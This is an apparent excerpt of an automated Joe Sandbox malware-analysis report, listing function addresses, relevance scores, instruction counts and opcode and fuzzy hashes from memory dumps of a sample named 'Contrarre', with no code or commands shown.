Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b2a397adad00a1ab01103296f9bf24972d02298cfc30aa5fddec28291d47955
Instruction ID: f0bf9303db79605a22a9184b0abe78436e5bda10f56429dc4af3229fc089b857
Opcode Fuzzy Hash: 6b2a397adad00a1ab01103296f9bf24972d02298cfc30aa5fddec28291d47955
Instruction Fuzzy Hash: 452177B4E04209DFCB44DFA9C191AEEBBF5EF49304F609069D419A7715D730AA41CF91

Function 0B8BC8F6 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f484e85cdda3da008581a4cf10f140966a74523b5affec144c575479b911b4
Instruction ID: 788d9395a31e5b44934a8e4e631146d4418fcbc2d1518d02e1add9a8270a7fc1
Opcode Fuzzy Hash: a5f484e85cdda3da008581a4cf10f140966a74523b5affec144c575479b911b4
Instruction Fuzzy Hash: F311E7B0A09209DBEB44CF66C4808EDBBBAFF8E305B14E155D41AA7326C734A942CF50

Function 0B8B1E28 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f04ad8f206fbf91ce508d3798eecc3c38a93bab16e75264a14525889aac570
Instruction ID: f40232ed1a474baf7f7a1fc72b698e8db47d606d889d608e99086182b064b255
Opcode Fuzzy Hash: c7f04ad8f206fbf91ce508d3798eecc3c38a93bab16e75264a14525889aac570
Instruction Fuzzy Hash: 982117B4E04209DFCB48EFA9D554AAEBBF2FF88300F1085AAD415E7354D7349A41CB50

Function 0B8B8568 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0dddf93cd3b71224d1e5659afc5df78fdd59b9bdb58e0a8fa68ca5b02383159
Instruction ID: b631afeec1458eecaf4ed40c293ea3d5489c2c5c12775c1ccbf2ab96297b244f
Opcode Fuzzy Hash: a0dddf93cd3b71224d1e5659afc5df78fdd59b9bdb58e0a8fa68ca5b02383159
Instruction Fuzzy Hash: 731146B4E05209EFDB44CFB5E540ADEBBF6AF89300F2485AAD404E3354E7308A44CB92

Function 0B8B74D8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e75fde1bb7063fd7416af0f594a8026838d93d2322bde26fbf84e2c02c4f74
Instruction ID: 62788b81b723ad0c35787a39b69723593fc8b16e101ed5297be9fb055803c275
Opcode Fuzzy Hash: e9e75fde1bb7063fd7416af0f594a8026838d93d2322bde26fbf84e2c02c4f74
Instruction Fuzzy Hash: A311C435608384AFDB0A9B788811D8A7FB5EF47210B0A81E7D484CB3B2D6349D06DB62

Function 0B8BB9D0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020c6e4bf1b73a235baee21f179592b6516748bb20e0d7ce471a935dfa695a74
Instruction ID: 53fac3450cc202cec01e2dbd01421a355284c195641e4546353dcd0a9be69464
Opcode Fuzzy Hash: 020c6e4bf1b73a235baee21f179592b6516748bb20e0d7ce471a935dfa695a74
Instruction Fuzzy Hash: E4112074D0A248DFCB41DFA9C5909EDBBF5EF4A300F04A1D68428AB322D330AA40CB41

Function 0B8B0F74 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c515514eff5946614ff99c5ab7b4621b611325fab3bc346bca5147abc037ba56
Instruction ID: f6f49ae18b1e0a21fc40ac9f7bd5878577d4ee2712fcb807a3bc5aa493655756
Opcode Fuzzy Hash: c515514eff5946614ff99c5ab7b4621b611325fab3bc346bca5147abc037ba56
Instruction Fuzzy Hash: 3921D3B59003499FCB10DFAAD884ADEBBF4FB48310F108429E929B7750C375A955CFA5

Function 0B8BBE59 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710b03c258c2590ac8aa201e9884f27e09ff402fe6cb8756ce74a11f4d184cd2
Instruction ID: f0328ddab3a8d863858a0d3a475d93a6ea4ffe10df2c71c31bfbc2b592551aff
Opcode Fuzzy Hash: 710b03c258c2590ac8aa201e9884f27e09ff402fe6cb8756ce74a11f4d184cd2
Instruction Fuzzy Hash: D721C0B1D006588BEB18CFAAC9547DEFAF2EFC9304F08C06AD409AA264DB7409458F90

Function 0145D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384936513.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_145d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b0d7f62eddf526038b33059a9dc74dfebad07484a2581a44ae0e854e5d6bf9
Instruction ID: 3fe0abec0cb99694c4354357fbc079e75c8bb6df4f785f81e262cca6a0a0fa4d
Opcode Fuzzy Hash: 87b0d7f62eddf526038b33059a9dc74dfebad07484a2581a44ae0e854e5d6bf9
Instruction Fuzzy Hash: 2011CD72804284CFCB16CF54D9C0B16BF61FB84218F2486AADC490B267C336D45ACBA1

Function 0B8B84A8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf33be602109d21f7dd1f6e3e38b8a4abe1f385093356f58b59a5d8eb88928e7
Instruction ID: 274c5d17c9de8cd232c1fda738ab9ee291cd632c50468d8cab274868c8ed6ab3
Opcode Fuzzy Hash: cf33be602109d21f7dd1f6e3e38b8a4abe1f385093356f58b59a5d8eb88928e7
Instruction Fuzzy Hash: 0C1128B4E05249DFDB48CFA9D54569EBFF6FF89200F2484AAC419E7325E6309A40CB51

Function 0B8BBF99 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a9a58ceb39ff8150032b7a164476bf23b6203c306b9e72f25f3374351dc9d7
Instruction ID: 76f083437bf7afb683174375d532b7e174843651f1f43fbd3b7fd4198bc557d9
Opcode Fuzzy Hash: 35a9a58ceb39ff8150032b7a164476bf23b6203c306b9e72f25f3374351dc9d7
Instruction Fuzzy Hash: 54115B30D09249CFCB14CF78D880AE8BBB4FB4A325F5055AAC515E73A2DB349980CF10

Function 0146D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385001440.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b47feca94270b740618d68776718196dc6443b68f0699b06cace4f2b94ebc2
Instruction ID: b390f23592746d4e2b172e116fd0c517cccb6f0e9cb8d818be6914353cfbb2b5
Opcode Fuzzy Hash: 06b47feca94270b740618d68776718196dc6443b68f0699b06cace4f2b94ebc2
Instruction Fuzzy Hash: B611BE75A04240DFDB16CF54C5C0B16BB61FB84228F28C6AAD8894B3A6C33AD44ACB52

Function 0B8BBE68 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b6f9868e0838f4ff394a0e310ba90e991bae6dd79b28c9f7acdcb43f2bb87d
Instruction ID: b3ab8fdcd668e9d8d0e9401472f679c41dfa2f18bc22242acd9ce75d1053e5f8
Opcode Fuzzy Hash: 42b6f9868e0838f4ff394a0e310ba90e991bae6dd79b28c9f7acdcb43f2bb87d
Instruction Fuzzy Hash: D21190B1D006189BEB18CFABD8557DEFAF6EFC8304F14C06AD409B6264DBB509468F90

Function 0B8B2317 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c520dd26ed5e635a60749119114f60fa2209e4df423e4cfb8c1be9ae96da43c
Instruction ID: 2d43050b3910cba59d2c8e43c66d405db6d05419d1941a2e3a862ee1285d4667
Opcode Fuzzy Hash: 7c520dd26ed5e635a60749119114f60fa2209e4df423e4cfb8c1be9ae96da43c
Instruction Fuzzy Hash: 0A21AF74A01318CFDB54CF68C984A9DBBB1FF88311F1095A9E809AB395DB35AE84CF10

Function 0B8BB9E0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6421ab3fa26432344c90f1d05c4685a86488c23d3c90262cf206a734ec56953
Instruction ID: f4621416acddb6ac5131310c756c85320afe12c1fe43b0ba57d0bf5271efd30e
Opcode Fuzzy Hash: f6421ab3fa26432344c90f1d05c4685a86488c23d3c90262cf206a734ec56953
Instruction Fuzzy Hash: 8A11B7B4D0920CDFDB44DFA9D5409EDBBF9FB49314F11A5A59428E7322D370AA418F81

Function 0B8B8578 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d4db5a5882bfefefc9ca1a611f25e746bf7a4278dafd15d944ac90f53e4211
Instruction ID: 8af7c5e14f529e3c926def36b02aabe62ff909319ae10c5355528646c9dea1fd
Opcode Fuzzy Hash: 43d4db5a5882bfefefc9ca1a611f25e746bf7a4278dafd15d944ac90f53e4211
Instruction Fuzzy Hash: 941148B4E05209DFDB48CFA9D584A9EBBF6BF88304F2085AAD405E3364E7309A01CB41

Function 0B8B84B8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfffedf1a68b8a1468748238b8bb5b6e322fc09b27fb00eecc3e93784b0c7dc
Instruction ID: bb0ef98adff4c2b1b2948d92e3982682cc04d7102d73fa1b01b2e77bee50741c
Opcode Fuzzy Hash: 1cfffedf1a68b8a1468748238b8bb5b6e322fc09b27fb00eecc3e93784b0c7dc
Instruction Fuzzy Hash: C21118B4E05609DFDB48DFA9D541A9EBBF6FB89200F24C4AAC419E7324E7309A40CB50

Function 0B8BC8A8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c38b00baacd3c29675b0f14acaca01fb34606c62c28090e628923e308fb3f7e
Instruction ID: d46c3a15dd6fa54e6645460f9ce9744c74af78d7a18903720bf03352a8387f68
Opcode Fuzzy Hash: 5c38b00baacd3c29675b0f14acaca01fb34606c62c28090e628923e308fb3f7e
Instruction Fuzzy Hash: 9F117CB4E05208CFDB48CFAAD5409EEBBFAAF8D204B14906AD819E7365D7349941CF50

Function 0B8BCCC0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8460a1be74e588334481554dd3a374a85eda726b904af1727763ccc128b5db
Instruction ID: 113796b561dba9de8fc5c5a2fea71bcdf3b6f3b997db91a812884d987e2b5f07
Opcode Fuzzy Hash: bc8460a1be74e588334481554dd3a374a85eda726b904af1727763ccc128b5db
Instruction Fuzzy Hash: DC012935904108DFD700DFB9C694EA8BFF5EF4A300B1980D5D4099B366C630AA41EF00

Function 0B8B672C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da23f9007a7ec656a708e29d1e6071f12150e1431d105289e2e90e178a860399
Instruction ID: e3a88747d97edd9b7ba83a62af3e338cdb7e8287b609a262508064bd96134741
Opcode Fuzzy Hash: da23f9007a7ec656a708e29d1e6071f12150e1431d105289e2e90e178a860399
Instruction Fuzzy Hash: E4111EB4E0420ADFCB48CFA9D5416AEFBF2EB88300F10856AD404E3714E7305A40DB95

Function 0B8B6730 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd043a2080c458226bb1321dc9d4245c039457ff9abcc373691806e498fa0033
Instruction ID: 65c8c409b241ec4857a6141b32d704fe06e0896f8f3f52db860c464add0f4fec
Opcode Fuzzy Hash: dd043a2080c458226bb1321dc9d4245c039457ff9abcc373691806e498fa0033
Instruction Fuzzy Hash: 86111EB4E0520EDFCB48CFA9D5416AEFBF2EB88300F10856AC504E3314E7305A419B95

Function 0145D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384936513.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_145d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5998c212a1e8d9d2de5acc431212148c3e57439b25c0324c94badd283ca213c
Instruction ID: 51ae19f197d8b059692998a61f93e14c5d949cc8390ee52d26f39cd76c36aa5d
Opcode Fuzzy Hash: a5998c212a1e8d9d2de5acc431212148c3e57439b25c0324c94badd283ca213c
Instruction Fuzzy Hash: 3601DB318053C49BF7509B65CD84767FF98DF81625F14C46BED094F293D2789840CAB6

Function 0B8BCC49 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48275a8c69f11dbff927c6fd06849b5f080791c8076298d3bc0f06dde53d8505
Instruction ID: 8412c8d071d1f19d55661b4c343fd7294f68c42e026844ea9e43666d47183812
Opcode Fuzzy Hash: 48275a8c69f11dbff927c6fd06849b5f080791c8076298d3bc0f06dde53d8505
Instruction Fuzzy Hash: FD018F7050C288DFD745CB76C460DF9BBB9EFAB204B0895DAD4598B273D6309A41DF80

Function 0B8B8670 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226967ce8fff9ec5a8970417764e2f11e05e83c457487801b8e649225deab07e
Instruction ID: 173c567e1cc6c0576fba249790f62605ae2a7bb080bbb3adc9459733f074acf7
Opcode Fuzzy Hash: 226967ce8fff9ec5a8970417764e2f11e05e83c457487801b8e649225deab07e
Instruction Fuzzy Hash: 15018BB4E09209DFCB44CFB4D91579EBBF6AB8A200F2880AAC005E3365E7308A44CB41

Function 0B8BBF19 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8099200725d730a138ff0924956a5fbbac179e81a8355e610d6d2c58980c9aa3
Instruction ID: d9b45ad5f50700d8b027966cb82caf3c10549728f1bf52676d05517084acb06f
Opcode Fuzzy Hash: 8099200725d730a138ff0924956a5fbbac179e81a8355e610d6d2c58980c9aa3
Instruction Fuzzy Hash: D4016934A0D298CFCB528B70D8509E4BF74EF4B205B0941EBD55ADB263C635184ACB62

Function 0B8BCCD0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf024e8edba4a3fe29d0e03788079d2f27ac758528eaa82e1ac1865c29650db6
Instruction ID: 87febe1c97715166db7eeaa26bc50d7b8914da6ec2e74cc31342b13112e47206
Opcode Fuzzy Hash: cf024e8edba4a3fe29d0e03788079d2f27ac758528eaa82e1ac1865c29650db6
Instruction Fuzzy Hash: 6001E878A04208EFDB44DFB9C694EADBBF9EF49300F159495981997362D630AE40DF40

Function 0B8BCC58 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3988dcb9d1b8ec9312307782e6e135769ee49d734a57693e4219b4878b38edc
Instruction ID: cfbc8c4c9b58db84e18908d394d89069751ef02ba7d12d2d9c131139d0603930
Opcode Fuzzy Hash: d3988dcb9d1b8ec9312307782e6e135769ee49d734a57693e4219b4878b38edc
Instruction Fuzzy Hash: 36F0AFB090820CDBC704CF76C410DF9BBBCEFAA304F0491A994199B322D7308A40EF80

Function 0B8BE355 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a51b64f791ae2f65c703f36dbb580b69262bbcac1e6f10b79f424ab559ff5d
Instruction ID: 0d0bb495fd4362d0c35bd7973ae70e0a0ac296de101a671968e3b6bb00103848
Opcode Fuzzy Hash: 74a51b64f791ae2f65c703f36dbb580b69262bbcac1e6f10b79f424ab559ff5d
Instruction Fuzzy Hash: B81135B4904309DFDB00CFA6E284AADBBF6FB08302B14812AD016DB366DB309C81CB50

Function 0B8B8680 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f33176a73927494d81c8d05469052203eec43313a67f014a5011267712f6f0e
Instruction ID: fc1720678b33b74e77f521bb55f8359b99bd5fa67c5646ee9a59b6f1e737c0a5
Opcode Fuzzy Hash: 0f33176a73927494d81c8d05469052203eec43313a67f014a5011267712f6f0e
Instruction Fuzzy Hash: 36018C74E05209DFCB48CFB4D54979EBBFAAB8A300F24D0AA8018E3364E7309A408B04

Function 0B8BE433 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ad06b6fd203249ec8f985d7cdbcd6b1571d158c7c6780e61f2abb381e5d7b31
Instruction ID: 7daf58c0343236951afa6937c42b885c52b343bd969a5d85ba4c4dfd01c6b95d
Opcode Fuzzy Hash: 4ad06b6fd203249ec8f985d7cdbcd6b1571d158c7c6780e61f2abb381e5d7b31
Instruction Fuzzy Hash: F7115B78A00218CFDB248B25D984BDAB7B2EB86200F1086F9954DA7714DB305E82CF16

Function 0145D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384936513.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_145d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab36b022f6ac4ebda04fa8dd84e87a3752234722d3c05a02cc64b55f8a536ed
Instruction ID: 83134958b05175adc490cd8186021605c811431724c9920abb7216a88780574e
Opcode Fuzzy Hash: 5ab36b022f6ac4ebda04fa8dd84e87a3752234722d3c05a02cc64b55f8a536ed
Instruction Fuzzy Hash: 99F0C2324053849FE7108A1ACC84B63FF98EF80334F18C45AEE084E293C2789844CAB1

Function 0B8B7068 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375511be184816fda140f1fdb7535cf990be1b781755f9c8d80366d08202fa5e
Instruction ID: 61b008980b89ed2b070db6c2e1ea5c67bdaeb12ead3c9dec417015670da1fd84
Opcode Fuzzy Hash: 375511be184816fda140f1fdb7535cf990be1b781755f9c8d80366d08202fa5e
Instruction Fuzzy Hash: B401F2B8D092099FCB50EFB8D5016EEBBB5EB49300F0084AAD814E3392E7754A41CBA1

Function 0B8B7078 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03598dd898a9703d16e81df356149f9af01937229381829ac11e93426b8e62d
Instruction ID: 712a9b5b320b5e61e6da19fa475f0fb39ece02142aaf19e040b67137abe9e418
Opcode Fuzzy Hash: b03598dd898a9703d16e81df356149f9af01937229381829ac11e93426b8e62d
Instruction Fuzzy Hash: C4F0EDB8D042099FCB44DFB8D5056AEBBF0FB88300F0084AAC819E3340EB755A01CBA1

Function 0B8BF822 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8fe2e59332bd2ae0f14488e3ea550351f8ea86e50159636c13f0bb15e39890
Instruction ID: 7caefbf806b3534cb335bf3633009ce278148dcc4d31641451d4c6c95848de65
Opcode Fuzzy Hash: ff8fe2e59332bd2ae0f14488e3ea550351f8ea86e50159636c13f0bb15e39890
Instruction Fuzzy Hash: 0BF03075D04248EFCB41DFA8D55469DBFB1EF49311F0480EBD854A7251D6340A94DF01

Function 0B8BC90A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773658128f02d24d9b87887985c7e1e92bb1da47f85a1c212e8d9aa802464b94
Instruction ID: 4c8dd49b353290bdc5539e5f21001ef4205b12bcab8a0791bd2934a1ba7e824c
Opcode Fuzzy Hash: 773658128f02d24d9b87887985c7e1e92bb1da47f85a1c212e8d9aa802464b94
Instruction Fuzzy Hash: 43F0F8B0A09288CFDB44CF79D0908E9BFF9EF4E215B046099E429DB257C7389441CF20

Function 0B8B8858 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841d98893d79eb0ed3d500263a5cf6f475bf4faa02bff11e61d70ec32e34d2c3
Instruction ID: 6663c2e01fd0f219164105a206dbf368e9d4521059bb6d7995e8039c24f32da2
Opcode Fuzzy Hash: 841d98893d79eb0ed3d500263a5cf6f475bf4faa02bff11e61d70ec32e34d2c3
Instruction Fuzzy Hash: E5F01578A10348AFCB85EFB8D404A98BBF4AF09204F4480EAD888D7361E6355A01CF81

Function 0B8BF830 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4166259c1dbf7280f100f92e68ec8a66eae255d7cdfbdf7c524a057ff8227ef1
Instruction ID: d1b475903f0df7e5dbdc89586dd5ce9eb177ab90706ed5fdb092aa24c4ed2a69
Opcode Fuzzy Hash: 4166259c1dbf7280f100f92e68ec8a66eae255d7cdfbdf7c524a057ff8227ef1
Instruction Fuzzy Hash: D1F03978D0020CEFCB80EFA9D90469DBBF5EF88301F00C0BAA818A3350D6345A94EF41

Function 0B8B8628 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

